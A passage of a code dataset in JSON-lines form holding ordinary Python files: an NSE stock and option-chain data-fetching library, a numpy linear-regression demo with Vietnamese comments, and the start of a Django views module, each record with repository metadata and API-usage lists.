{"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 132, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 141, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 142, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 209, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 209, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 214, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 218, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 218, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 222, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 222, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 223, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 225, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 226, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 251, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 253, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 253, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 255, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 255, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 256, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 256, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 257, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 257, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 261, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 269, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 274, "usage_type": "call"}, {"api_name": "pygame.mixer.music.stop", "line_number": 280, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 280, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 285, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 285, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 298, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 298, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 303, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 303, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 305, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 305, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 308, "usage_type": "call"}]} +{"seq_id": "39213877094", "text": "import os\nimport concurrent.futures\nimport io\nimport math\nimport json\n\nfrom datetime import datetime,timedelta\nimport pandas as pd\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\n\nfrom bandl.nse_urls import NseUrls\nfrom bandl.helper import get_formated_date,get_date_range\nfrom bandl.request import RequestUrl\n\n#default params for url connection\nDEFAULT_TIMEOUT = 5 # seconds\nMAX_RETRIES = 3\nINDEX_DATA_LIMIT = 99\nSTOCK_DATA_LIMIT = 240\n#default to last three month\nPART_OI_DAYS = 22*3\n\n#to disable pandas warning\npd.set_option('mode.chained_assignment', None)\n\nclass NseData:\n def __init__(self,timeout=DEFAULT_TIMEOUT,max_retries=MAX_RETRIES):\n self.__nse_urls = NseUrls()\n self.__headers = self.__nse_urls.header\n #create request\n self.__request = RequestUrl(timeout,max_retries)\n\n def get_underlying_val(self,symbol):\n \"\"\"get value of underlying asset\n :param symbol: stock/index symbol\n :type symbol: string\n :raises Exception: NSE connection related\n :return: underlying value\n :rtype: integer\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n underlying_val = oc_json['records']['underlyingValue']\n return underlying_val\n\n except Exception as err:\n raise Exception(\"something went wrong while reading nse URL :\", str(err))\n\n def get_indices(self):\n \"\"\"To get list of NSE indices\n \"\"\"\n try:\n index_page = self.__request.get(self.__nse_urls.INDEX_URL,headers=self.__headers)\n soup = BeautifulSoup(index_page.text,'lxml')\n table = soup.find(\"select\",{\"id\":\"indexType\"})\n indices_data = table.find_all(\"option\")\n indices = [index.get(\"value\") for index in indices_data if \"NIFTY\" in index.get(\"value\")]\n\n #lets append india vix as well\n indices.append(\"INDIA VIX\")\n return indices\n except Exception as err:\n raise Exception(\"Error occurred while getting NSE indices :\", str(err))\n\n def get_oc_strike_prices(self,symbol,format=True,level=3):\n \"\"\"To get options strike prices or in OTM,ITM,ATM format\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param format: format in OTM,ITM,ATM, defaults to True\n :type format: bool, optional\n :param level: level of strike prices for ITM/OTM, defaults to 3\n :type level: int, optional\n :raises Exception: NSE connection related\n :return: strike prices\n :rtype: list/dictionary\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n underlying_val = oc_json['records']['underlyingValue']\n strikePrices = oc_json['records']['strikePrices']\n #if normat strike prices are requested then return as it is\n if not format:\n return strikePrices\n\n strike_count = len(strikePrices)\n #else lets format in OTM/ITM/ATM\n atm_index= min(range(strike_count), key = lambda i: abs(strikePrices[i]-underlying_val))\n strikes = {\"ATM\":strikePrices[atm_index],\"ITM\":[],\"OTM\":[]}\n for index in range(level):\n if index + atm_index < strike_count -1:\n strikes[\"OTM\"].append(strikePrices[index+atm_index+1])\n if atm_index - index > 1:\n strikes[\"ITM\"].append(strikePrices[atm_index-index-1])\n return strikes\n\n except Exception as err:\n raise Exception(\"something went wrong while fetching nse :\", str(err))\n\n def get_oc_exp_dates(self,symbol):\n\n \"\"\"get current available expiry dates\n\n :param symbol: stock/index symbol\n :type symbol: string\n :raises Exception: NSE connection related\n :return: expiry dates\n :rtype: list\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n expiry_dates = oc_json['records']['expiryDates']\n return expiry_dates\n\n except Exception as err:\n raise Exception(\"something went wrong while fetching nse :\", str(err))\n\n def get_option_data(self,symbol,expiry_date=None,strikes=None):\n \"\"\"get option data\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param expiry_date: expiry date (all date formats accepted), defaults to next near\n :type expiry_date: string, optional\n :param strikes: Dictionary having OTM,ITM,ATM strikes, defaults to None\n :type strikes: Dictionary, optional\n :raises Exception: Connection related\n :return: underlying_val, option data\n :rtype: pair\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n underlying_val = oc_json['records']['underlyingValue']\n if not expiry_date:\n oc_data = oc_json['filtered']['data']\n oc_mapped_data = {}\n for eachData in oc_data:\n strikePrice = eachData.get(\"strikePrice\")\n if(strikes):\n if (strikePrice == strikes[\"ATM\"]\n or strikePrice in strikes[\"ITM\"]\n or strikePrice in strikes[\"OTM\"]):\n oc_mapped_data[strikePrice] = {\"CE\":eachData.get(\"CE\"),\"PE\":eachData.get(\"PE\")}\n else:\n oc_mapped_data[strikePrice] = {\"CE\":eachData.get(\"CE\"),\"PE\":eachData.get(\"PE\")}\n return underlying_val,oc_mapped_data\n except Exception as err:\n raise Exception(\"something went wrong while fetching nse :\", str(err))\n\n\n\n def get_option_chain_df(self, symbol, expiry_date=None,dayfirst=False):\n \"\"\" This function fetches option chain data from NSE and returns in pandas.DataFrame\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param expiry_date: expiry date (all date formats accepted), defaults to next near\n :type expiry_date: string\n :param dayfirst: True if date format is european style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :raises Exception: NSE connection related\n :raises Exception: In html parsing\n :return: option chain\n :rtype: pandas.DataFrame\n \"\"\"\n try:\n if not expiry_date:\n expiry_date = self.get_oc_exp_dates(symbol)[0]\n\n oc_url = self.__nse_urls.get_option_chain_url(symbol, expiry_date,dayfirst)\n # If the response was successful, no Exception will be raised\n oc_page = self.__request.get(oc_url, headers = self.__headers)\n\n except Exception as err:\n raise Exception(\"Error occurred while connecting NSE :\", str(err))\n else:\n try:\n dfs = pd.read_html(oc_page.text)\n return dfs[1]\n except Exception as err:\n raise Exception(\"Error occurred while reading html :\", str(err))\n\n def __get_file_path(self, file_name, file_path = None, is_use_default_name = True):\n \"\"\"[summary]\n\n :param file_name: file name\n :type file_name: string\n :param file_path: file directory or file path , defaults to None\n :type file_path: string, optional\n :param is_use_default_name: to get filename in current timestamp, defaults to True\n :type is_use_default_name: bool, optional\n :return: file path\n :rtype: string\n \"\"\"\n try:\n if not file_path:\n file_path = os.getcwd()\n\n if os.path.isfile(file_path):\n if (not is_use_default_name):\n return file_path\n # if need to use default file path, we get parent path\n else:\n file_path = os.path.dirname(file_path)\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d_%B_%H_%M\")\n file_name = file_name + \"_\" + dt_string + \".xlsx\"\n\n excel_path = os.path.join(file_path, file_name)\n return excel_path\n except Exception as err:\n print(\"Error while naming file. Error: \", str(err))\n\n def get_option_chain_excel(self, symbol, expiry_date=None,dayfirst=False,file_path = None, is_use_default_name = True):\n \"\"\"Fetches NSE option chain data and returns in the form of excel (.xlsx)\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param expiry_date: expiry date (all date formats accepted), defaults to next near\n :type expiry_date: string\n :param dayfirst: True if date format is european style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :param file_path: file/folder path, defaults to None\n :type file_path: string, optional\n :param is_use_default_name: to get filename as current timestamp, defaults to True\n :type is_use_default_name: bool, optional\n :raises Exception: NSE connection related\n \"\"\"\n try:\n if not expiry_date:\n expiry_date = self.get_oc_exp_dates(symbol)[0]\n\n df = self.get_option_chain_df(symbol, expiry_date,dayfirst)\n file_name = symbol + \"_\" + expiry_date\n excel_path = self.__get_file_path(file_name, file_path, is_use_default_name)\n\n df.to_excel(excel_path, file_name)\n except Exception as err:\n raise Exception(\"Error occurred while getting excel :\", str(err))\n\n def __join_part_oi_dfs(self,df_join,df_joiner):\n \"\"\"will append joiner to join for oi_dfs\n\n :param df_join: Dictionary of participants\n :type df_join: dict\n :param df_joiner: Dictionary of participants\n :type df_joiner: dict\n \"\"\"\n for client in df_join:\n df_join[client] = self.__join_dfs(df_join[client],df_joiner[client]).sort_index()\n\n def __join_dfs(self,join,joiner):\n \"\"\"will append joiner to join for oi_dfs\n\n :param join: df which will be appended\n :type join: pandas.DataFrame\n :param joiner: df which we want to append\n :type joiner: pandas.DataFrame\n :return: merged data frame\n :rtype: pandas.DataFrame\n \"\"\"\n return join.append(joiner)\n\n def get_part_oi_df(self,start=None,end=None,periods=None,dayfirst=False,workers=None):\n \"\"\"Return dictionary of participants containing data frames\n\n :param start: start date , defaults to None\n :type start: string, optional\n :param end: end date, defaults to None\n :type end: string, optional\n :param periods: number of days, defaults to None\n :type periods: interger, optional\n :param dayfirst: True if date format is european style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :param workers: Number of threads for requesting nse, defaults to None\n :type workers: interger, optional\n :raises Exception: NSE Connection/Request overload\n :return: participant wise open interest\n :rtype: pandas.DataFrame\n \"\"\"\n try:\n #format date just in case\n if start:\n start = get_formated_date(start,dayfirst=dayfirst)\n if end:\n end = get_formated_date(end,dayfirst=dayfirst)\n\n #if both none, we set end to today\n if not start and not end:\n end = get_formated_date()\n if not periods:\n periods = PART_OI_DAYS\n #get urls for these days\n dates = pd.date_range(start=start,end=end, periods=periods,freq='B')\n url_date = [(self.__nse_urls.get_participant_oi_url(date),date) for date in dates]#\n\n oi_clm = self.__nse_urls.PART_OI_CLM\n #lets preinitialize, better readability\n oi_dfs = { \"Client\":pd.DataFrame(columns=oi_clm,index=dates),\n \"DII\":pd.DataFrame(columns=oi_clm,index=dates),\n \"FII\":pd.DataFrame(columns=oi_clm,index=dates),\n \"Pro\":pd.DataFrame(columns=oi_clm,index=dates),\n \"TOTAL\":pd.DataFrame(columns=oi_clm,index=dates)\n }\n\n if not workers:\n workers = os.cpu_count() * 2\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:\n responses = {executor.submit(self.__request.get, url,self.__headers): date for url,date in url_date}\n for res in concurrent.futures.as_completed(responses):\n date = responses[res]\n try:\n csv = res.result()\n except Exception as exc:\n #might be holiday\n pass\n else:\n df = pd.read_csv(io.StringIO(csv.content.decode('utf-8')))\n #drop the first header\n df_header = df.iloc[0]\n #is there any implace way?\n df = df[1:]\n df.columns = df_header\n df.set_index('Client Type',inplace=True)\n #lets us create data frome for all client type\n oi_dfs['Client'].loc[date] = df.loc['Client']\n oi_dfs['FII'].loc[date] = df.loc['FII']\n oi_dfs['DII'].loc[date] = df.loc['DII']\n oi_dfs['Pro'].loc[date] = df.loc['Pro']\n oi_dfs['TOTAL'].loc[date] = df.loc['TOTAL']\n\n if not oi_dfs['Client'].empty:\n #remove nan row\n for client in oi_dfs:\n oi_dfs[client].dropna(inplace=True)\n\n #if holiday occurred in business day, lets retrive more data equivalent to holdidays.\n if oi_dfs['Client'].shape[0] < periods:\n new_periods = periods - oi_dfs['Client'].shape[0]\n try:\n #if only start, find till today\n if start and (not end):\n s_from = oi_dfs['Client'].index[-1] + timedelta(1)\n e_till = None\n #if not start, can go to past\n elif(end and (not start)):\n s_from = None\n e_till = oi_dfs['Client'].index[0] - timedelta(1)\n #if start and end, no need to change\n else:\n return oi_dfs\n except IndexError as err:\n raise Exception(\"NSE Access error.size down/clean cookies to resolve the issue.\")\n except Exception as exc:\n raise Exception(\"participant OI error: \",str(exc))\n\n oi_dfs_new = self.get_part_oi_df(start = s_from,end = e_till,periods = new_periods)\n self.__join_part_oi_dfs(oi_dfs,oi_dfs_new)\n\n return oi_dfs\n\n except Exception as err:\n raise Exception(\"Error occurred while getting part_oi :\", str(err))\n\n def __parse_indexdata(self,res_txt,symbol):\n dfs = pd.read_html(res_txt)[0]\n if dfs.shape[0] <2:\n raise Exception(\"No record found\")\n if \"NIFTY\" in symbol:\n fined_dfs = dfs.iloc[0:]\n fined_dfs.columns = self.__nse_urls.INDEX_DATA_CLM\n elif symbol == \"INDIA VIX\":\n fined_dfs = dfs.iloc[1:]\n fined_dfs.drop(fined_dfs.index[0],inplace=True)\n fined_dfs.columns = self.__nse_urls.VIX_DATA_CLM\n fined_dfs.drop(fined_dfs.index[-1],inplace=True)\n fined_dfs.set_index(\"Date\",inplace=True)\n return fined_dfs\n\n def __get_datarange_intv(self,start,end,intv):\n diff = math.ceil((end - start).days / intv)\n date_ranges = []\n curr_start = prev_start = start\n for i in range(diff):\n curr_start = (start + timedelta(intv * i))\n if i !=0:\n start_ = prev_start\n end_ = curr_start - timedelta(1)\n date_ranges.append((start_,end_))\n prev_start = curr_start\n date_ranges.append((curr_start,end))\n return date_ranges\n\n def __get_data_adjusted(self,dfs,symbol,series=\"EQ\",start=None,end=None,periods=None):\n if periods and (dfs.shape[0] < periods):\n new_periods = periods - dfs.shape[0]\n try:\n s_from = e_till = None\n #if only start, find till today\n if start and (not end):\n s_from = dfs.index[0] + timedelta(1)\n e_till = None\n #if not start, can go to past\n elif((end and (not start)) or periods):\n s_from = None\n e_till = dfs.index[-1] - timedelta(1)\n except IndexError as err:\n raise Exception(\"NSE Access error.\")\n except Exception as exc:\n raise Exception(\"Stock data error: \",str(exc))\n try:\n dfs_new = self.get_data(symbol,series,start = s_from,end = e_till,periods = new_periods)\n dfs = self.__join_dfs(dfs,dfs_new).sort_index(ascending=False)\n except Exception as exc:\n #data may not be available\n pass\n return dfs\n\n def __format_df(self,dfs):\n if not dfs.empty:\n dfs.columns = dfs.columns.str.title()\n\n def get_data(self,symbol,series=\"EQ\",start=None,end=None,periods=None,dayfirst=False):\n \"\"\"To get NSE stock data\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param series: segment, defaults to \"EQ\"\n :type series: string, optional\n :param start: start date, defaults to None\n :type start: string, optional\n :param end: end date, defaults to None\n :type end: string, optional\n :param periods: number of days, defaults to None\n :type periods: interger, optional\n :param dayfirst: True if date format is european style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :raises Exception: NSE Connection Related\n :return: stock data\n :rtype: pandas.DataFrame\n \"\"\"\n try:\n\n #Step1: get the date range\n s_from,e_till = get_date_range(start=start,end=end,periods=periods,dayfirst=dayfirst)\n\n if s_from > e_till:\n raise ValueError(\"End should grater than start.\")\n\n data_limit = None\n if self.__nse_urls.is_index(symbol):\n data_limit = INDEX_DATA_LIMIT\n else:\n data_limit = STOCK_DATA_LIMIT\n\n data_days = e_till - s_from\n\n hack = self.__request.get(self.__nse_urls.BASE_URL,headers=self.__headers)\n if (data_days.days) > data_limit:\n date_ranges = self.__get_datarange_intv(s_from,e_till,data_limit)\n workers = len(date_ranges)\n with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:\n responses = [executor.submit(self.get_data, symbol=symbol,start=start_,end=end_,dayfirst=dayfirst)\\\n for start_,end_ in date_ranges]\n dfs = []\n for res in concurrent.futures.as_completed(responses):\n try:\n df = res.result()\n dfs.append(df)\n except Exception as exc:\n #might be holiday/no record\n pass\n all_dfs = pd.concat(dfs).sort_index(ascending=False)\n adjusted_dfs = self.__get_data_adjusted(all_dfs,symbol,start=start,end=end,periods=periods)\n return adjusted_dfs\n\n data_url = self.__nse_urls.get_stock_data_url\\\n (\n symbol,series=series,start=s_from,\n end=e_till\n )\n\n csv = self.__request.get(data_url,headers=self.__headers)\n\n #if it is index, wee need to read table\n # Why the heck, We are doing so much handling? Is there any other way?\n # Suggestions are welcome. ping me on github\n if self.__nse_urls.is_index(symbol):\n dfs = self.__parse_indexdata(csv.text,symbol)\n else:\n dfs = pd.read_csv(io.StringIO(csv.content.decode('utf-8')))\n dfs.set_index('Date ',inplace=True)\n # Converting the index as date\n dfs.index = pd.to_datetime(dfs.index)\n dfs = self.__get_data_adjusted(dfs,symbol,start=start,end=end,periods=periods)\n #format dataframe\n self.__format_df(dfs)\n return dfs\n\n except Exception as err:\n raise Exception(\"Error occurred while fetching stock data :\", str(err))", "repo_name": "stockalgo/bandl", "sub_path": "lib/bandl/nse_data.py", "file_name": "nse_data.py", "file_ext": "py", "file_size_in_byte": 22315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.set_option", "line_number": 25, "usage_type": "call"}, {"api_name": "bandl.nse_urls.NseUrls", "line_number": 29, "usage_type": "call"}, {"api_name": "bandl.request.RequestUrl", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 58, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 191, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 220, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 220, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "bandl.helper.get_formated_date", "line_number": 300, "usage_type": "call"}, {"api_name": "bandl.helper.get_formated_date", "line_number": 302, "usage_type": "call"}, {"api_name": "bandl.helper.get_formated_date", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.date_range", "line_number": 310, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 315, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 316, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 317, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 319, "usage_type": "call"}, {"api_name": "os.cpu_count", "line_number": 323, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 325, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 325, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 325, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 327, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 327, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 327, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 335, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 335, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 360, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 365, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 383, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 398, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 402, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 405, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 418, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 423, "usage_type": "call"}, {"api_name": "bandl.helper.get_date_range", "line_number": 462, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 479, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 479, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 479, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 483, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 483, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 483, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 490, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 508, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 508, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 511, "usage_type": "call"}]} +{"seq_id": "7323499478", "text": "#cài đặt thư viện cần thiết\r\nimport numpy as np\r\n#thư viện để vẽ biểu đồ\r\nimport matplotlib.pyplot as plt\r\n\r\n#phát sinh dữ liệu\r\n#Tạo dữ liệu X có giá trị từ -5 đến 5 \r\n#với bước nhảy bằng 0.5\r\nx = np.arange(-5,5,0.5)\r\n#Giá trị n_sample là số lượng phần tử (dữ liệu) của mảng X\r\nn_sample = len(x)\r\n#Giá trị noise - nhiễu thống kê \r\n#liên quan đến sự biến thiên trong mẫu\r\n#Nhiễu được biển diễn dưới dạng biến ngẫu nhiên\r\nnoise = np.random.normal(0,1,n_sample)\r\n#Khởi tạo giá trị Y\r\nY = 5*x - 6 +noise\r\n#biểu diễn x và Y trên đồ thị dưới dạng chấm tròn màu đỏ\r\nplt.plot(x,Y, 'ro')\r\n\r\n\r\n# Tạo một mảng gồm những giá trị 1\r\n# mảng có độ dài bằng độ dài của mảng x\r\nones = np.ones((1,n_sample))\r\n# Mảng X là mảng được gộp bởi mảng những giá trị 1 \r\n# và mảng x đã được khởi tạo ở trên\r\nX = np.concatenate((ones, [x]))\r\n#In mảng X\r\nprint(X)\r\n#In mảng Y\r\nprint(Y)\r\n#khởi tạo giá trị theta, alpha,eps\r\ntheta = np.array([[10],[-5]])\r\nalpha = 0.01\r\neps = 0.0001\r\n\r\n\r\n#Lặp\r\n#Cập nhật tham số\r\n#Kiểm tra điểm dừng của vòng lặp\r\nwhile True:\r\n #Tích của X và theta chuyển vị trừ cho Y \r\n #Lấy chuyển vị của hiệu số nhân với X \r\n #Tất cả chia n_sample\r\n #Đạo hàm theo vector theta\r\n nabla = (1.0/n_sample)*np.dot(X, (np.dot(theta.T, X) - Y).T)\r\n #Cập nhật theta để thay đổi nabla ở bước sau \r\n theta = theta - alpha*nabla\r\n \r\n #Trực quan hóa kết quả, vẽ phương trình đường thẳng \r\n #y = theta1*x + theta0\r\n \r\n #trực quan hóa dữ liệu\r\n x_vis = np.array([-5.0,5.0])\r\n y_vis = theta[1][0]*x_vis + theta[0][0]\r\n plt.plot(x_vis,y_vis)\r\n plt.pause(0.1)\r\n \r\n #Tính lại nabla\r\n nabla = (1.0/n_sample)*np.dot(X, (np.dot(theta.T, X) - Y).T)\r\n if abs(nabla[0][0]) < eps and abs(nabla[1][0]) < eps:\r\n break\r\n \r\n#In kết quả \r\nprint('Gia tri toi uu cua theta = ', theta)\r\nplt.show()\r\n\r\n", "repo_name": "dhlinhdan/CS331.M21-", "sub_path": "np_linear_regression_.py", "file_name": "np_linear_regression_.py", "file_ext": "py", "file_size_in_byte": 2150, "program_lang": "python", "lang": "vi", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "26587417995", "text": "from django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.views.decorators.cache import cache_page\n\nfrom .forms import PostForm, CommentForm\nfrom .models import Group, Post, Comment, Follow\nfrom .utils import paginator\n\nUser = get_user_model()\n\n\n@cache_page(20, key_prefix='index_page')\ndef index(request):\n \"\"\"\n Вью функция отвечающая за вывод постов на главной странице,\n пагинируется, сортируется от новых к старым, 10 постов на страницу.\n \"\"\"\n post_list = Post.objects.select_related()\n page_number = request.GET.get('page')\n page_obj = paginator(post_list).get_page(page_number)\n\n context = {\n 'page_obj': page_obj,\n }\n return render(request, 'posts/index.html', context)\n\n\ndef group_posts(request, slug):\n \"\"\"\n Вью функция отвечающая за вывод постов на странице группы,\n пагинируется, сортируется от новых к старым и по принадлежности\n к группе, 10 постов на страницу.\n \"\"\"\n group = get_object_or_404(Group, 